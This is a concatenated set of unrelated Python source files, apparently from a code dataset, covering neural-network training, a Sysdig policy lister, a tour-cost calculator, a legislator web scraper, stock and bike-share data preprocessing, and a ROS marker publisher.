        Phi = self.matrix[self.index_matrix[index], :, :].astype('float32')
        # Step size derived from the matrix's largest eigenvalue.
        rho = 0.4 / self.eigenvals[self.index_matrix[index]]
        Phi_split = Phi.reshape((5, 24, 3072))
        # Random intensity scaling augments the surface and cloud maps.
        surface = np.random.uniform(low=0.2, high=1.0) * self.surface[self.index_surface[index], :]
        clouds = np.random.uniform(low=0.2, high=1.0, size=5)[:, None] * self.clouds[self.index_clouds[:, index], :]
        # Forward model: observations of clouds plus surface attenuated by (1 - clouds)^2.
        d_split = np.zeros((5, 24))
        for i in range(5):
            d_split[i, :] = Phi_split[i, :, :] @ (clouds[i, :] + (1.0 - clouds[i, :])**2 * surface)
        return Phi_split, surface.astype('float32'), clouds.astype('float32'), rho.astype('float32'), d_split.astype('float32')

    def __len__(self):
        return self.n_training
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
    """Persist a training checkpoint; mirror it to '<filename>.best' when best."""
    torch.save(state, filename)
    if not is_best:
        return
    shutil.copyfile(filename, '{0}.best'.format(filename))
class Training(object):
    """Training driver: builds the model, datasets and loaders, then runs the
    train/validate loop with CSV logging and best-model checkpointing."""

    def __init__(self, batch_size, validation_split=0.2, gpu=0, smooth=0.05, K=3, model_class='conv1d'):
        self.cuda = torch.cuda.is_available()
        self.gpu = gpu
        self.smooth = smooth  # exponential smoothing factor for the running loss display
        self.device = torch.device(f"cuda:{self.gpu}" if self.cuda else "cpu")
        # self.device = 'cpu'
        self.batch_size = batch_size
        self.model_class = model_class
        self.K = K  # number of unrolled iterates whose surface loss is summed
        if (NVIDIA_SMI):
            nvidia_smi.nvmlInit()
            self.handle = nvidia_smi.nvmlDeviceGetHandleByIndex(self.gpu)
            print("Computing in {0} : {1}".format(self.device, nvidia_smi.nvmlDeviceGetName(self.handle)))
        self.validation_split = validation_split
        kwargs = {'num_workers': 4, 'pin_memory': False} if self.cuda else {}
        # Model variant chosen by string key; 2D variant also needs HEALPix NSIDE.
        if (model_class == 'conv1d'):
            self.model = model.Network(K=self.K, L=32, device=self.device, model_class=model_class).to(self.device)
        if (model_class == 'conv2d'):
            self.model = model.Network(K=self.K, L=32, NSIDE=16, device=self.device, model_class=model_class).to(self.device)
        print('N. total parameters : {0}'.format(sum(p.numel() for p in self.model.parameters() if p.requires_grad)))
        self.train_dataset = Dataset(n_training=20000)
        self.validation_dataset = Dataset(n_training=2000)
        # Data loaders that will inject data during training
        self.train_loader = torch.utils.data.DataLoader(self.train_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True, **kwargs)
        self.validation_loader = torch.utils.data.DataLoader(self.validation_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True, **kwargs)

    def init_optimize(self, epochs, lr, weight_decay, scheduler):
        """Prepare optimizer/loss/scheduler and snapshot the code + hyperparameters
        under a timestamped output name."""
        self.lr = lr
        self.weight_decay = weight_decay
        print('Learning rate : {0}'.format(lr))
        self.n_epochs = epochs
        if (self.model_class == 'conv1d'):
            root = 'trained_denoise_clouds_1d'
        if (self.model_class == 'conv2d'):
            root = 'trained_denoise_clouds_2d'
        p = pathlib.Path(f'{root}/')
        p.mkdir(parents=True, exist_ok=True)
        current_time = time.strftime("%Y-%m-%d-%H:%M:%S")
        self.out_name = f'{root}/{current_time}'
        # Copy model source and this trainer next to the outputs for reproducibility.
        file = model.__file__.split('/')[-1]
        shutil.copyfile(model.__file__, '{0}_model.py'.format(self.out_name))
        shutil.copyfile('{0}/{1}'.format(os.path.dirname(os.path.abspath(__file__)), file), '{0}_trainer.py'.format(self.out_name))
        self.file_mode = 'w'
        # Record the exact command line and the hyperparameters.
        f = open('{0}_call.dat'.format(self.out_name), 'w')
        f.write('python ' + ' '.join(sys.argv))
        f.close()
        f = open('{0}_hyper.dat'.format(self.out_name), 'w')
        f.write('Learning_rate Weight_decay \n')
        f.write('{0} {1}'.format(self.lr, self.weight_decay))
        f.close()
        self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.lr, weight_decay=self.weight_decay)
        self.loss_fn = nn.MSELoss().to(self.device)
        self.scheduler = torch.optim.lr_scheduler.StepLR(self.optimizer, step_size=scheduler, gamma=0.5)
        np.random.seed(123)
        # Initial guesses for surface/clouds.  NOTE(review): the random tensors
        # are immediately overwritten by zeros -- confirm which init is intended.
        self.surf0 = torch.tensor(np.random.rand(self.batch_size, 3072).astype('float32')).to(self.device)
        self.surf0 = torch.zeros((self.batch_size, 3072)).to(self.device)
        self.clouds0 = torch.tensor(np.random.rand(self.batch_size, 5, 3072).astype('float32')).to(self.device)
        self.clouds0 = torch.zeros((self.batch_size, 5, 3072)).to(self.device)
        torch.backends.cudnn.benchmark = True

    def optimize(self):
        """Run the full loop: per epoch train + validate, step the scheduler,
        append to the loss CSV, and checkpoint (flagging the best model)."""
        self.loss = []
        self.loss_val = []
        best_loss = 1e10
        trainF = open('{0}.loss.csv'.format(self.out_name), self.file_mode)
        print('Model : {0}'.format(self.out_name))
        for epoch in range(1, self.n_epochs + 1):
            self.train(epoch)
            self.test(epoch)
            self.scheduler.step()
            trainF.write('{},{},{}\n'.format(
                epoch, self.loss[-1], self.loss_val[-1]))
            trainF.flush()
            is_best = self.loss_val[-1] < best_loss
            best_loss = min(self.loss_val[-1], best_loss)
            save_checkpoint({
                'epoch': epoch + 1,
                'state_dict': self.model.state_dict(),
                'best_loss': best_loss,
                'optimizer': self.optimizer.state_dict(),
            }, is_best, filename='{0}.pth'.format(self.out_name))
        trainF.close()

    def train(self, epoch):
        """One training epoch: MSE on the reconstructed surface, summed over
        the first K unrolled iterates; appends the smoothed loss to self.loss."""
        self.model.train()
        print("Epoch {0}/{1}".format(epoch, self.n_epochs))
        t = tqdm(self.train_loader)
        loss_avg = 0.0
        n = 1
        for param_group in self.optimizer.param_groups:
            current_lr = param_group['lr']
        for batch_idx, (Phi_split, surface, clouds, rho, d_split) in enumerate(t):
            Phi_split, surface, clouds, rho, d_split = Phi_split.to(self.device), surface.to(self.device), clouds.to(self.device), rho.to(self.device), d_split.to(self.device)
            self.optimizer.zero_grad()
            surf, clouds, out_surface, out_clouds = self.model(d_split, self.surf0, self.clouds0, Phi_split, rho, n_epochs=5)
            # Loss
            loss = 0.0
            for i in range(self.K):
                loss += self.loss_fn(out_surface[i], surface)
                # loss += self.loss_fn(out_clouds[i], clouds)
            loss.backward()
            self.optimizer.step()
            # Exponentially smoothed running loss for the progress bar.
            if (batch_idx == 0):
                loss_avg = loss.item()
            else:
                loss_avg = self.smooth * loss.item() + (1.0 - self.smooth) * loss_avg
            if (NVIDIA_SMI):
                tmp = nvidia_smi.nvmlDeviceGetUtilizationRates(self.handle)
                t.set_postfix(loss=loss_avg, lr=current_lr, gpu=tmp.gpu, mem=tmp.memory)
            else:
                t.set_postfix(loss=loss_avg, lr=current_lr)
        self.loss.append(loss_avg)

    def test(self, epoch):
        """One validation epoch; mirrors train() without gradient updates and
        appends the smoothed loss to self.loss_val."""
        self.model.eval()
        t = tqdm(self.validation_loader)
        n = 1
        loss_avg = 0.0
        with torch.no_grad():
            for batch_idx, (Phi_split, surface, clouds, rho, d_split) in enumerate(t):
                Phi_split, surface, clouds, rho, d_split = Phi_split.to(self.device), surface.to(self.device), clouds.to(self.device), rho.to(self.device), d_split.to(self.device)
                surf, clouds, out_surface, out_clouds = self.model(d_split, self.surf0, self.clouds0, Phi_split, rho, n_epochs=5)
                # Loss
                loss = 0.0
                for i in range(self.K):
                    loss += self.loss_fn(out_surface[i], surface)
                    # loss += self.loss_fn(out_clouds[i], clouds)
                if (batch_idx == 0):
                    loss_avg = loss.item()
                else:
                    loss_avg = self.smooth * loss.item() + (1.0 - self.smooth) * loss_avg
                t.set_postfix(loss=loss_avg)
        self.loss_val.append(loss_avg)
if (__name__ == '__main__'):
    # Command-line entry point: parse hyperparameters and run one training job.
    parser = argparse.ArgumentParser(description='Train neural network')
    parser.add_argument('--lr', '--learning-rate', default=3e-4, type=float,
                        metavar='LR', help='Learning rate')
    parser.add_argument('--wd', '--weigth-decay', default=0.0, type=float,
                        metavar='WD', help='Weigth decay')
    parser.add_argument('--gpu', '--gpu', default=0, type=int,
                        metavar='GPU', help='GPU')
    parser.add_argument('--smooth', '--smoothing-factor', default=0.05, type=float,
                        metavar='SM', help='Smoothing factor for loss')
    parser.add_argument('--epochs', '--epochs', default=100, type=int,
                        metavar='EPOCHS', help='Number of epochs')
    parser.add_argument('--scheduler', '--scheduler', default=100, type=int,
                        metavar='SCHEDULER', help='Number of epochs before applying scheduler')
    parser.add_argument('--batch', '--batch', default=32, type=int,
                        metavar='BATCH', help='Batch size')
    parser.add_argument('--model', '--model', default='conv1d', type=str,
                        metavar='MODEL', help='Model class')
    parser.add_argument('--k', '--k', default=15, type=int,
                        metavar='K', help='K')
    parsed = vars(parser.parse_args())
    deepnet = Training(batch_size=parsed['batch'], gpu=parsed['gpu'], smooth=parsed['smooth'], K=parsed['k'], model_class=parsed['model'])
    deepnet.init_optimize(parsed['epochs'], lr=parsed['lr'], weight_decay=parsed['wd'], scheduler=parsed['scheduler'])
    deepnet.optimize()
15,730 | b84c49fc698973cd6761dd4a60ece90ad17a5246 | #!/usr/bin/env python
#
# List the current set of secure policies.
#
import getopt
import json
import sys
from sdcclient import SdSecureClientV1
def usage():
    """Print command-line usage and exit with status 1."""
    print(('usage: %s [-o|--order-only] <sysdig-token>' % sys.argv[0]))
    print('-o|--order-only: Only display the list of policy ids in evaluation order. '
          'Suitable for use by set_policy_order.py')
    print('You can find your token at https://secure.sysdig.com/#/settings/user')
    sys.exit(1)
# Parse the optional -o/--order-only flag; bad options show usage and exit.
try:
    opts, args = getopt.getopt(sys.argv[1:], "o", ["order-only"])
except getopt.GetoptError:
    usage()
order_only = False
for opt, arg in opts:
    if opt in ("-o", "--order-only"):
        order_only = True
#
# Parse arguments
#
if len(args) < 1:
    usage()
sdc_token = args[0]
#
# Instantiate the SDC client
#
sdclient = SdSecureClientV1(sdc_token, 'https://secure.sysdig.com')
ok, res = sdclient.get_policy_priorities()
if not ok:
    print(res)
    sys.exit(1)
# Strip the surrounding json to only keep the list of policy ids
res = res['priorities']['policyIds']
if not order_only:
    # Full listing requested: fetch policies and sort them into evaluation order.
    priorities = res
    ok, res = sdclient.list_policies()
    if ok:
        res['policies'].sort(key=lambda p: priorities.index(p['id']))
#
# Return the result
#
if ok:
    print((json.dumps(res, indent=2)))
else:
    print(res)
    sys.exit(1)
|
15,731 | e0e7a22dfd3426a7140e2a3bd80dfbf28cbd2168 | import numpy as np
import os
import re
import matplotlib.pyplot as plt
import math
holes = []
solution = []
numholes = 0
def calculatePrice(hole_coords=None, tour=None):
    """Return the tour's total Euclidean length minus its single longest edge
    (i.e. the cost of the best open path along the given cycle order).

    Args:
        hole_coords: sequence of (x, y) points; defaults to the module-level
            `holes` global for backward compatibility with the no-arg call.
        tour: sequence of indices into *hole_coords* giving the visit order;
            defaults to the module-level `solution` global.
    """
    # Fall back to the globals populated by readSolution() when called bare.
    if hole_coords is None:
        hole_coords = holes
    if tour is None:
        tour = solution
    n = len(tour)
    price = 0.0
    max_cost = 0.0
    for i in range(n):
        # Edge from the i-th stop to the next, wrapping around at the end.
        edge_cost = np.linalg.norm(np.array(hole_coords[tour[i]]) - np.array(hole_coords[tour[(i + 1) % n]]))
        price += edge_cost
        if edge_cost > max_cost:
            max_cost = edge_cost
    return price - max_cost
def readSolution():
    """Load hole coordinates and the tour order into the module globals.

    Reads one hole per line from the instance file and one index per line
    from the solution file, stopping at the shorter of the two.
    NOTE(review): both paths are hard-coded Windows paths.
    """
    global holes, solution, numholes
    fileIn = f'C:\\Users\\mn170387d\\Desktop\\in263.txt'
    fileSol = f'C:\\Users\\mn170387d\\Desktop\\solutionNN.txt'
    print("Solution file:",fileSol);
    with open(f'{fileIn}', 'r') as readerIn, open(f'{fileSol}') as readerSol:
        hole = readerIn.readline()
        sol = readerSol.readline()
        while hole != '' and sol != '':
            numholes = numholes + 1
            # First two numbers on the instance line are the hole's x/y coordinates.
            coords = re.findall("\-?\d+\.\d+|\-?\d+", hole)
            holes.append((float(coords[0]), float(coords[1])))
            # First number on the solution line is the next hole index in the tour.
            sol = re.findall("\-?\d+\.\d+|\-?\d+", sol)
            solution.append((int(sol[0])));
            hole = readerIn.readline()
            sol = readerSol.readline()
def main():
    """Load the instance and tour, then report the open-tour cost."""
    readSolution();
    price = calculatePrice()
    print("Minimum cost without longest edge:",price)
if __name__ == '__main__':
    main()
|
15,732 | bf85aa7b0e007a0208595ad3c14df05736d2dd9e | from sqlobject import *
hub = sqlhub
class Piece(SQLObject):
    """A sellable catalog piece."""
    title = StringCol(notNull=True)
    link = StringCol(alternateID=True)  # unique slug/URL key
    description = StringCol()
    price = CurrencyCol()
    inventory = IntCol(notNull=True, default=0)  # units in stock
    active = BoolCol(notNull=True, default=True)  # hidden from the store when False
class PieceTags(SQLObject):
    """One tag attached to a piece; rows are deleted with their piece."""
    piece = ForeignKey('Piece', cascade=True)
    tag = StringCol(notNull=True)
class Section(SQLObject):
    """A storefront section, selecting pieces by tag."""
    title = StringCol(notNull=True)
    link = StringCol(alternateID=True)  # unique slug/URL key
    description = StringCol()
    tag = StringCol()
def init_db(reset=False):
    """Create all tables if missing; when *reset* is True, empty them too."""
    for table in Piece, PieceTags, Section:
        table.createTable(ifNotExists=True)
        if reset:
            table.clearTable()
15,733 | e17857fccc3e9654552097bf4a0930168a079edf |
a=25
b=15
# Python 2 print statements: sum, difference, product, quotient and remainder.
# NOTE: under Python 2, a/b is integer (floor) division, so 25/15 prints 1.
print a+b
print a-b
print a*b
print a/b
print a%b
is_male = False
is_tall = True

# Classify by the four combinations of the two flags.
if is_male and is_tall:
    print("You are a tall male")
elif is_male and not is_tall:
    print("You are a short male")
elif not is_male and not is_tall:
    # Fixed: this branch previously repeated the "short male" message even
    # though it only runs when is_male is False.
    print("You are not a male and not tall")
else:
    # Only reachable when not male but tall; also fixes the "nor tall" typo.
    print("You are either not male or not tall or both")
15,735 | eac21d206975994fb0b9bf083e7ffa94085bfc05 | import datetime
import re
import attr
from spatula.core import Workflow
from spatula.pages import HtmlPage, HtmlListPage
from spatula.selectors import XPath
from common import Person
PARTY_MAP = {"R": "Republican", "D": "Democratic", "I": "Independent"}
party_district_pattern = re.compile(r"\((R|D|I)\) - (?:House|Senate) District\s+(\d+)")
name_elect_pattern = re.compile(r"(- Elect)$")
def get_party_district(text):
    """Return (party, district) parsed from text like '(R) - House District 10'."""
    pattern = re.compile(r"\((R|D|I)\) - (?:House|Senate) District\s+(\d+)")
    return pattern.match(text).groups()
lis_id_patterns = {
"upper": re.compile(r"(S[0-9]+$)"),
"lower": re.compile(r"(H[0-9]+$)"),
}
def get_lis_id(chamber, url):
    """Retrieve the LIS ID of a legislator from their profile URL.

    Returns the ID string (e.g. 'S15' for upper, 'H15' for lower) or None
    when the URL carries no ID.  Fixes the original `if match.groups:` test,
    which was always truthy and raised AttributeError on a non-matching URL.
    """
    # Patterns defined inline so the function is self-contained.
    patterns = {
        "upper": re.compile(r"(S[0-9]+$)"),
        "lower": re.compile(r"(H[0-9]+$)"),
    }
    match = patterns[chamber].search(url)
    if match:
        return match.group(1)
    return None
def clean_name(name):
    """Strip '- Elect' suffixes and trailing '-Resigned/-Member MM/DD' notes.

    Returns (name, action, date); action/date are None when the name carries
    no membership-change annotation.
    """
    name = name_elect_pattern.sub("", name).strip()
    action, date = (None, None)
    match = re.search(r"-(Resigned|Member) (\d{1,2}/\d{1,2})?", name)
    if match:
        action, date = match.groups()
        # NOTE(review): rsplit with no maxsplit behaves like split, so a
        # hyphenated surname would be truncated at its first hyphen — confirm
        # this is intended for the upstream data.
        name = name.rsplit("-")[0]
    return name, action, date
def maybe_date(text):
    """Normalise *text* to ISO ``YYYY-MM-DD``; return '' when unparseable.

    NOTE(review): the input format is ``%Y-%d-%m`` (year-DAY-month), which
    looks deliberate for the upstream session data — confirm.
    """
    try:
        parsed = datetime.datetime.strptime(text, "%Y-%d-%m")
    except ValueError:
        return ""
    return parsed.strftime("%Y-%m-%d")
# TODO: restore when we do committees again
# def get_committees(self, item):
# for com in item.xpath('//ul[@class="linkSect"][1]/li/a/text()'):
# key = (com, self.chamber)
# if key not in self.kwargs["committees"]:
# org = Organization(
# name=com, chamber=self.chamber, classification="committee"
# )
# org.add_source(self.url)
# self.kwargs["committees"][key] = org
# self.obj.add_membership(
# self.kwargs["committees"][key],
# start_date=maybe_date(self.kwargs["session"].get("start_date")),
# end_date=maybe_date(self.kwargs["session"].get("end_date", "")),
# )
@attr.s(auto_attribs=True)
class PartialMember:
    """Scrape intermediate: list-page data handed on to the detail pages."""
    name: str
    url: str
    image: str = None  # filled in later by SenatePhotoDetail, when available
class MemberList(HtmlListPage):
    """Scrapes the LIS member index for one chamber (see SenateList/DelegateList)."""
    session_id = "211"  # 2021
    source = f"http://lis.virginia.gov/{session_id}/mbr/MBR.HTM"

    def process_item(self, item):
        """Return a PartialMember for an active member, or None to skip it."""
        name = item.text
        lname = name.lower()
        # skip members who are no longer serving
        if "resigned" in lname or "vacated" in lname or "retired" in lname:
            return
        name, action, date = clean_name(name)
        return PartialMember(name=name, url=item.get("href"))
class SenateList(MemberList):
    """Upper-chamber member index (right column of the LIS page)."""
    chamber = "upper"
    selector = XPath('//div[@class="lColRt"]/ul/li/a')
class DelegateList(MemberList):
    """Lower-chamber member index (left column of the LIS page)."""
    chamber = "lower"
    selector = XPath('//div[@class="lColLt"]/ul/li/a')
class MemberDetail(HtmlPage):
    """Scrape a single legislator's detail page into a Person record."""
    input_type = PartialMember

    def get_source_from_input(self):
        return self.input.url

    def process_page(self):
        """Build the Person from the header text and attach links/offices."""
        party_district_text = self.root.xpath("//h3/font/text()")[0]
        party, district = get_party_district(party_district_text)
        p = Person(
            name=self.input.name, state="va", chamber=self.chamber, party=party, district=district,
        )
        if self.input.image:
            p.image = self.input.image
        p.add_link(self.source.url)
        p.add_source(self.source.url)
        self.get_offices(p)
        return p

    def get_offices(self, person):
        """Parse address / phone / email blocks out of the page's link lists."""
        for ul in self.root.xpath('//ul[@class="linkNon" and normalize-space()]'):
            address = []
            phone = None
            email = None
            for li in ul.getchildren():
                text = li.text_content()
                if re.match(r"\(\d{3}\)", text):
                    phone = text.strip()
                elif text.startswith("email:"):
                    # Bug fix: str.strip("email: ") strips a *character set*
                    # from both ends and therefore ate letters of the address
                    # itself (e.g. "email: mike@x.com" -> "ke@x.co").
                    email = text.split("email:", 1)[1].strip()
                else:
                    address.append(text.strip())
            if "Capitol Square" in address:
                office_obj = person.capitol_office
            else:
                office_obj = person.district_office
            office_obj.address = "; ".join(address)
            if phone:
                office_obj.voice = phone
            if email:
                person.email = email
class SenateDetail(MemberDetail):
    """Senator detail page (upper chamber)."""
    input_type = PartialMember
    role = "Senator"
    chamber = "upper"
class SenatePhotoDetail(HtmlPage):
    """Fetches a senator's profile photo URL from the Senate member app."""
    input_type = PartialMember

    def get_source_from_input(self):
        lis_id = get_lis_id("upper", self.input.url)
        return f"http://apps.senate.virginia.gov/Senator/memberpage.php?id={lis_id}"

    def process_page(self):
        """Attach the photo URL (or None) to the partial member and pass it on."""
        src = self.root.xpath('.//img[@class="profile_pic"]/@src')
        img = src[0] if src else None
        # protocol-relative URLs ("//host/...") are made absolute
        if img and img.startswith("//"):
            img = "https:" + img
        self.input.image = img
        return self.input
class DelegateDetail(MemberDetail):
    """Delegate detail page (lower chamber); derives the photo URL from the LIS id."""
    role = "Delegate"
    chamber = "lower"

    def process_page(self):
        p = super().process_page()
        lis_id = get_lis_id(self.chamber, self.input.url)
        if lis_id:
            # zero-pad the numeric part, e.g. "H123" -> "H0123"
            lis_id = "{}{:04d}".format(lis_id[0], int(lis_id[1:]))
            p.image = f"http://memdata.virginiageneralassembly.gov/images/display_image/{lis_id}"
        return p
senators = Workflow(SenateList(), (SenatePhotoDetail, SenateDetail))
delegates = Workflow(DelegateList(), DelegateDetail)
|
15,736 | 1e3f340e1c57ed35cd1c7af1afbacb497e9ebb46 | import timeit
'''
start_time = timeit.default_timer()
some_function()
print( '{:.99f}'.format( timeit.default_timer() - start_time ).rstrip('0').rstrip('.') )
'''
import pandas as pd
import numpy as np
import datetime
import ml_trader.config as config
import ml_trader.utils as utils
import ml_trader.utils.file as file
import ml_trader.utils.data.meta as meta
import ml_trader.utils.stock.indicators as stock_indicators
import ml_trader.utils.data.imports.get as get
from pprint import pprint
from sklearn import preprocessing
#from ml_trader.utils.compute import earnings
def prepare_labels_feat( data ):
    '''
    Transform data

    Builds normalised OHLCV history windows plus technical indicators and the
    matching next-step label values for supervised training.

    :param data: raw dataframe with a 'date' column plus OHLCV columns
    :return: ( dates, feat_ohlcv_histories_normalised,
               feat_technical_indicators_normalised,
               labels_scaled, labels_unscaled, label_normaliser )
    '''
    history_points = config.history_points
    # The first day of trading that stock often looked anomalous due to the massively high volume (IPO).
    # This inflated max volume value also affected how other volume values in the dataset were scaled when normalising the data,
    # so we drop the oldest data point out of every set)
    data.sort_values( 'date', inplace=True, ascending=True )
    data['date'] = pd.to_datetime( data['date'] ) # Convert to datetime
    data['weekday_num'] = data['date'].apply( lambda x: x.weekday() ) # Get weekday_num as a feature
    data['date'] = data['date'].apply( utils.convert_to_timestamp ) # Convert to unix timestamp which can be normalized
    dates = data['date'].values
    # remove date column
    data = data.drop( 'date', axis=1 )
    # Remove first date since IPO's tend to swing wildly on the first day
    # of open and may confuse the model
    data = data.iloc[1:].values # Convert to numpy array
    # Normalise the data — scale it between 0 and 1 — to improve how quickly our network converges
    normaliser = preprocessing.MinMaxScaler()
    data_normalised = normaliser.fit_transform( data ) # Normalize all columns
    '''
    Using the last {history_points} open close high low volume data points, predict the next value
    Loop through all the stock data, and add build a normalized dataset that include x number of ohlcv history items for each stock date
    Lob off the first x items as they won't include x previous date
    x = history_points
    '''
    #TODO: Figure out why 'i+1:i + history_points+1' works, but not i:i + history_points
    #feat_ohlcv_histories_normalised = np.array( [data_normalised[i+1:i + history_points+1].copy() for i in range( len( data_normalised ) - history_points )] )
    feat_ohlcv_histories_normalised = np.array( [data_normalised[i:i + history_points].copy() for i in range( len( data_normalised ) - history_points )] )
    # Normalize technical indictors
    feat_technical_indicators_normalised = stock_indicators.get_technical_indicators( preprocessing.MinMaxScaler(), feat_ohlcv_histories_normalised )
    # Get normalized 'close' values, so model can be trained to predict this item
    labels_scaled = np.array( [data_normalised[:, meta.column_index[meta.label_column]][i + history_points].copy() for i in range( len( data_normalised ) - history_points )] )
    labels_scaled = np.expand_dims( labels_scaled, -1 ) #NICE: each item added to its own array and this is super fast
    labels_unscaled = np.array( [data[:, meta.column_index[meta.label_column]][i + history_points].copy() for i in range( len( data ) - history_points )] )
    labels_unscaled = np.expand_dims( labels_unscaled, -1 ) #NICE: each item added to its own array and this is super fast
    label_normaliser = preprocessing.MinMaxScaler()
    label_normaliser.fit( labels_unscaled )
    # Get dates in a single column
    dates = np.array( [dates[i + history_points].copy() for i in range( len( data ) - history_points )] )
    assert feat_ohlcv_histories_normalised.shape[0] == labels_scaled.shape[0] == feat_technical_indicators_normalised.shape[0]
    return dates, feat_ohlcv_histories_normalised, feat_technical_indicators_normalised, labels_scaled, labels_unscaled, label_normaliser
class Preprocess:
    """Loads the dataset once and serves train/test slices of the prepared arrays."""

    def __init__( self, test_split=False ):
        # test_split: fraction in (0, 1) marking where the training slice
        # ends; False disables splitting (split accessors are then invalid).
        self.dates, self.ohlcv_histories, self.technical_indicators, \
        self.scaled_y, self.unscaled_y, \
        self.y_normaliser = prepare_labels_feat( get.dataset() )
        print( "\n\n** Print data shapes: " )
        print( "*********************************" )
        print( "dates:", len( self.dates ) )
        print( "ohlcv_histories:", len( self.ohlcv_histories ) )
        print( "technical_indicators:", len( self.technical_indicators ) )
        print( "scaled_y:", len( self.scaled_y ) )
        print( "unscaled_y:", len( self.unscaled_y ) )
        print( "*********************************\n\n" )
        if test_split:
            self.n_split = int( self.ohlcv_histories.shape[0] * test_split )

    def get_unscaled_data( self ):
        # NOTE(review): despite the generic name this returns only the *test*
        # portion of the unscaled labels — confirm callers expect that.
        return ( self.unscaled_y[self.n_split:] )

    def get_training_data( self ):
        """Return (ohlcv, indicators, scaled labels, dates) before the split point."""
        return ( self.ohlcv_histories[:self.n_split], self.technical_indicators[:self.n_split], self.scaled_y[:self.n_split], self.dates[:self.n_split] )

    def get_test_data( self ):
        """Return (ohlcv, indicators, scaled labels, dates) from the split point on."""
        return ( self.ohlcv_histories[self.n_split:], self.technical_indicators[self.n_split:], self.scaled_y[self.n_split:], self.dates[self.n_split:] )

    def get_y_normalizer( self ):
        """Scaler fitted on the unscaled labels; use it to invert predictions."""
        return self.y_normaliser

    def get_history_for_date( self, date ):
        """Return the prepared sample at the insertion point of *date* in the date axis."""
        dates = np.array( [datetime.datetime.fromtimestamp( i ) for i in self.dates] )
        date_min = dates.min()
        date_max = dates.max()
        if ( date > date_min and date <= date_max ):
            idx = np.searchsorted( dates, date )
            return ( self.ohlcv_histories[idx], self.technical_indicators[idx], self.scaled_y[idx], self.dates[idx] )
        else:
            raise Exception( "Date ranges should be between '%s' & '%s'" % ( date_min.strftime( '%b %d, %Y' ), date_max.strftime( '%b %d, %Y' ) ) )
|
15,737 | 4a1032ecfd5e62dc26971720332d61ab29b1f724 | import typing as t
import typing_extensions as te
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
import datetime
import os
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import TimeSeriesSplit, cross_validate
from sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin
from sklearn.ensemble import RandomForestRegressor
from sklearn.pipeline import Pipeline
from sklearn.model_selection import TimeSeriesSplit, cross_validate
from sklearn.metrics import make_scorer
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LinearRegression
import matplotlib.pyplot as plt
from sklearn.model_selection import GridSearchCV
class DatasetReader(te.Protocol):
    """Structural type: any zero-argument callable producing the raw DataFrame."""

    def __call__(self) -> pd.DataFrame:
        ...
SplitName = te.Literal["train", "test"]
def get_dataset(reader: DatasetReader, splits: t.Iterable[SplitName]):
    """Read, clean, and time-split the bike-share data.

    Splits by year: rows through 2011 are train, 2012 is test.
    Returns {split_name: (X, y)} for the requested splits.
    """
    df = reader()
    df = clean_dataset(df)
    # NOTE(review): X and y below are computed but never used — the
    # year-based slices that follow are what is actually returned.
    y = df["cnt"]
    X = df[['season', 'holiday', 'weekday', 'workingday', 'weathersit','temp',
       'atemp', 'hum', 'windspeed', 'Yesterday', 'diff']]
    X_train = df[:'2011'].drop(['cnt'], axis=1)
    y_train = df.loc[:'2011','cnt']
    X_test = df['2012'].drop(['cnt'], axis=1)
    y_test = df.loc['2012','cnt']
    split_mapping = {"train": (X_train, y_train), "test": (X_test, y_test)}
    return {k: split_mapping[k] for k in splits}
def clean_dataset(df: pd.DataFrame) -> pd.DataFrame:
    """Apply the full cleaning pipeline to the raw hourly bike-share frame."""
    pipeline = _chain([
        _fix_drop_instant,
        _fix_datetime,
        _fix_dias_faltantes,
        _fix_organize_by_days,
        _fix_add_yesterday,
    ])
    return pipeline(df)
def _chain(functions: t.List[t.Callable[[pd.DataFrame], pd.DataFrame]]):
def helper(df):
for fn in functions:
df = fn(df)
return df
return helper
def _fix_drop_instant(df):
df = df.drop(columns='instant', axis=1)
return df
def _fix_datetime(df):
df['dteday'] = df['dteday'].astype('str')
df['hour'] = df['hr'].astype('str')+':00'
df['Datetime'] = df['dteday']+' '+df['hour']
df['Datetime'] = pd.to_datetime(df['Datetime'])
df = df.set_index('Datetime')
return df
def _fix_dias_faltantes(df):
df = df.asfreq(freq='60min', method='ffill')
return df
def _fix_organize_by_days(df):
df['day'] = df.index.day_name()
feature_columns_1 = ['day','season', 'holiday', 'weekday',
'workingday', 'weathersit', 'temp', 'atemp', 'hum', 'windspeed','cnt'
]
df = df[feature_columns_1].resample('D').mean()
return df
def _fix_add_yesterday(df):
df = df[['cnt','season', 'holiday', 'weekday',
'workingday', 'weathersit', 'temp', 'atemp', 'hum', 'windspeed']]
df.loc[:,'Yesterday'] = df.loc[:,'cnt'].shift()
df.loc[:,'diff'] = df.loc[:,'Yesterday'].diff()
df = df.dropna()
return df
|
15,738 | 0b1f4e0d1f7be6e77d1cc21b26951b4b18a5a921 | class Card:
def __init__(self, action, id):
self.action = action.lower()
self.id = id.lower()
self.image = self.action + ('' if self.id == '' else ' ') + self.id + '.jpg'
self.flipped = False
def __str__(self):
return self.action
|
15,739 | 4853eae150c6ff01024f488f9d8dd057777dd400 | #!/usr/bin/env python
import rospy
from geometry_msgs.msg import PoseStamped
from visualization_msgs.msg import Marker
pub = rospy.Publisher('/gateway/marker', Marker, queue_size = 10)
def callback(data):
    """Republish an incoming PoseStamped as a semi-transparent green sphere Marker."""
    m = Marker()
    m.header.frame_id = data.header.frame_id
    # m.header.stamp = rospy.get_time()
    m.ns = 'ncvrl'
    m.id = 0
    m.type = 2  # 2 == sphere marker type
    # m.pose.position.x = 0
    # m.pose.position.y = 0
    # m.pose.position.z = 0
    # m.pose.orientation.x = 0
    # m.pose.orientation.y = 0
    # m.pose.orientation.z = 0
    # m.pose.orientation.w = 1.0
    m.pose = data.pose  # reuse the incoming pose verbatim
    m.scale.x = 0.2
    m.scale.y = 0.2
    m.scale.z = 0.2
    m.color.a = 0.5  # half transparent
    m.color.r = 0.0
    m.color.g = 1.0
    m.color.b = 0.0
    pub.publish(m);
def gateway():
    """Node entry point: subscribe to /pose_tag and process callbacks forever."""
    rospy.init_node('gateway_pose_stamped_to_marker', anonymous=True)
    rospy.Subscriber("/pose_tag", PoseStamped, callback)
    rospy.spin()
if __name__ == '__main__':
gateway()
|
